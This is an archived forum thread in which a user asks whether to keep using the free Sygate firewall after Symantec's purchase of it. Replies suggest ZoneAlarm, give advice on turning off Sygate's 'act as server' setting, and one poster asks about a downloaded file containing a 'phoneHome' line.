Sygate ??

Having just read that Sygate was purchased by Symantic, and I just started using Sygate about a month ago, I'm wondering if I should be looking for something else or continue to use Sygate.

Overall, I like Sygate but I'm still in the learning stages.

I realize no one can see the future, but are the upgraded versions really that important. I mean Sygate is working now, but in six months or a year would technology outpace it?? [Assuming no further upgrades are issued]

Many moon ago, I used Zonealarm but it seemed to get flaky after awhile. Version 3 I think. Was using Norton until it expired. Came with new Dell System.

Currently using: XP Home Sygate AVGuard Firefox Agent Both AOL & MSN messenger.

No other apps have access to net. If anything comes up and asks to enter or leave computer I say no. So far nothing has barfed.

I've been reading this group and a virus group. Learned a lot, but I'm no expert in computers. Just looking for any info about situation.

Tom

Reply to
TJ
Loading thread data ...

i am a sygate die hard as well. symantec will probaly pull the plug on the free version. but who knows?

you could go with new ZA. it's not bad and better rated than most similar SFW's.

check this link for ratings and SFW options.

formatting link
dg

TJ wrote in news: snipped-for-privacy@4ax.com:

Reply to
dgavrilovic

I'm sticking with Sygate the free version for the next few months. Can't predict what I'll do after that.

Since you just started using it, remember to go to 'applications' and on each permitted app click on 'advanced' and set 'act as server' to No unless you specifically need it to serve. It's the one weakness of Sygate, a mistaken default setting. No big. Nex

Reply to
Alan Pollock

What is it suppose to do? The download manager came up and asked to open or save c from

formatting link
The file contained *phoneHome = "
formatting link
"and other stuff.

Reply to
Dave McAuliffe